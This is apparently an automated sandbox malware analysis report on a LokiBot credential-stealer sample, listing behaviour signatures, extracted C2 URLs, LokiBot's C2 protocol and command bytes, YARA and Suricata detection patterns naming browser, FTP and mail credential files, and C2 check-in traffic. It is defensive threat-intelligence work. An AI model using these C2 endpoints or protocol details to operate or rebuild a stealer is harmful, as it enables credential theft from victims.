Edit tour

Windows Analysis Report
dfiCWCanbj.exe

Overview

General Information

Sample name:	dfiCWCanbj.exe renamed because original name is a hash value
Original sample name:	62ABC4447D8B6877CAB7A721E0331450.exe
Analysis ID:	1619976
MD5:	62abc4447d8b6877cab7a721e0331450
SHA1:	0fb7673b2437afa906299a676caf4c2a177c4b89
SHA256:	e0c5db8ba3b32956b954091828136618e0130b148675dbb153c0b77b77e2d1d4
Tags:	exeLokiuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

dfiCWCanbj.exe (PID: 3580 cmdline: "C:\Users\user\Desktop\dfiCWCanbj.exe" MD5: 62ABC4447D8B6877CAB7A721E0331450)

svchost.exe (PID: 3968 cmdline: "C:\Users\user\Desktop\dfiCWCanbj.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.2150829579.0000000003BF0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
00000002.00000002.3383851438.0000000003421000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.3383578074.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Process Memory Space: dfiCWCanbj.exe PID: 3580	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: dfiCWCanbj.exe PID: 3580	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: dfiCWCanbj.exe PID: 3580	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dfiCWCanbj.exe PID: 3580	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xd74ef:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 3968	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 3968	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 3968	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 3968	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x292e0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.dfiCWCanbj.exe.3bf0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.dfiCWCanbj.exe.3bf0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.dfiCWCanbj.exe.3bf0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.dfiCWCanbj.exe.3bf0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.dfiCWCanbj.exe.3bf0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.svchost.exe.400000.1.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.svchost.exe.400000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.svchost.exe.400000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
2.2.svchost.exe.400000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.svchost.exe.400000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\dfiCWCanbj.exe", CommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", ParentImage: C:\Users\user\Desktop\dfiCWCanbj.exe, ParentProcessId: 3580, ParentProcessName: dfiCWCanbj.exe, ProcessCommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", ProcessId: 3968, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\dfiCWCanbj.exe", CommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", ParentImage: C:\Users\user\Desktop\dfiCWCanbj.exe, ParentProcessId: 3580, ParentProcessName: dfiCWCanbj.exe, ProcessCommandLine: "C:\Users\user\Desktop\dfiCWCanbj.exe", ProcessId: 3968, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:30.962592+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:32.871847+0100	2024312	1	A Network Trojan was detected	192.168.2.6	49711	104.21.80.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T15:06:30.081385+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49710	104.21.80.1	80	TCP
2025-02-20T15:06:32.114666+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49711	104.21.80.1	80	TCP
2025-02-20T15:06:32.976601+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49712	104.21.80.1	80	TCP
2025-02-20T15:06:34.912048+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49719	104.21.80.1	80	TCP
2025-02-20T15:06:37.017142+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49730	104.21.80.1	80	TCP
2025-02-20T15:06:38.915989+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49747	104.21.80.1	80	TCP
2025-02-20T15:06:40.848385+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49758	104.21.80.1	80	TCP
2025-02-20T15:06:43.038217+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49774	104.21.80.1	80	TCP
2025-02-20T15:06:44.922529+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49789	104.21.80.1	80	TCP
2025-02-20T15:06:47.032685+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49806	104.21.80.1	80	TCP
2025-02-20T15:06:49.052569+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49820	104.21.80.1	80	TCP
2025-02-20T15:06:51.051090+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49834	104.21.80.1	80	TCP
2025-02-20T15:06:52.946796+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49847	104.21.80.1	80	TCP
2025-02-20T15:06:55.022125+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49859	104.21.80.1	80	TCP
2025-02-20T15:06:57.236548+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49872	104.21.80.1	80	TCP
2025-02-20T15:06:59.191949+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49884	104.21.80.1	80	TCP
2025-02-20T15:07:01.021173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49897	104.21.80.1	80	TCP
2025-02-20T15:07:03.956144+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49912	104.21.80.1	80	TCP
2025-02-20T15:07:05.878161+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49923	104.21.80.1	80	TCP
2025-02-20T15:07:07.973258+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49938	104.21.80.1	80	TCP
2025-02-20T15:07:09.964814+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49951	104.21.80.1	80	TCP
2025-02-20T15:07:11.940214+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49961	104.21.80.1	80	TCP
2025-02-20T15:07:13.832444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49974	104.21.80.1	80	TCP
2025-02-20T15:07:15.638534+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49986	104.21.80.1	80	TCP
2025-02-20T15:07:17.558386+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	49998	104.21.80.1	80	TCP
2025-02-20T15:07:19.553017+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50008	104.21.80.1	80	TCP
2025-02-20T15:07:21.475252+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50010	104.21.80.1	80	TCP
2025-02-20T15:07:23.458173+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50011	104.21.80.1	80	TCP
2025-02-20T15:07:25.367621+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50012	104.21.80.1	80	TCP
2025-02-20T15:07:27.330956+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50013	104.21.80.1	80	TCP
2025-02-20T15:07:29.206393+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50014	104.21.80.1	80	TCP
2025-02-20T15:07:31.094570+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50015	104.21.80.1	80	TCP
2025-02-20T15:07:33.022213+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50017	104.21.80.1	80	TCP
2025-02-20T15:07:35.033842+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50018	104.21.80.1	80	TCP
2025-02-20T15:07:36.945112+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50019	104.21.80.1	80	TCP
2025-02-20T15:07:38.927592+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50020	104.21.80.1	80	TCP
2025-02-20T15:07:40.878181+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50021	104.21.80.1	80	TCP
2025-02-20T15:07:42.845534+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50022	104.21.80.1	80	TCP
2025-02-20T15:07:44.825217+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50023	104.21.80.1	80	TCP
2025-02-20T15:07:47.038071+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50025	104.21.80.1	80	TCP
2025-02-20T15:07:49.004232+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50026	104.21.80.1	80	TCP
2025-02-20T15:07:50.942877+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50027	104.21.80.1	80	TCP
2025-02-20T15:07:52.911840+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50028	104.21.80.1	80	TCP
2025-02-20T15:07:54.881380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50029	104.21.80.1	80	TCP
2025-02-20T15:07:56.772588+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50030	104.21.80.1	80	TCP
2025-02-20T15:07:58.679413+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50031	104.21.80.1	80	TCP
2025-02-20T15:08:00.794678+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50032	104.21.80.1	80	TCP
2025-02-20T15:08:02.738306+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50033	104.21.80.1	80	TCP
2025-02-20T15:08:04.747632+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50034	104.21.80.1	80	TCP
2025-02-20T15:08:06.689667+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50036	104.21.80.1	80	TCP
2025-02-20T15:08:08.766512+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50037	104.21.80.1	80	TCP
2025-02-20T15:08:10.754452+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50038	104.21.80.1	80	TCP
2025-02-20T15:08:12.769111+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50039	104.21.80.1	80	TCP
2025-02-20T15:08:14.749379+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50040	104.21.80.1	80	TCP
2025-02-20T15:08:16.794399+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50041	104.21.80.1	80	TCP
2025-02-20T15:08:18.771827+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50042	104.21.80.1	80	TCP
2025-02-20T15:08:20.704781+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50043	104.21.80.1	80	TCP
2025-02-20T15:08:22.688183+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50044	104.21.80.1	80	TCP
2025-02-20T15:08:24.585638+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50045	104.21.80.1	80	TCP
2025-02-20T15:08:26.526444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.6	50046	104.21.80.1	80	TCP
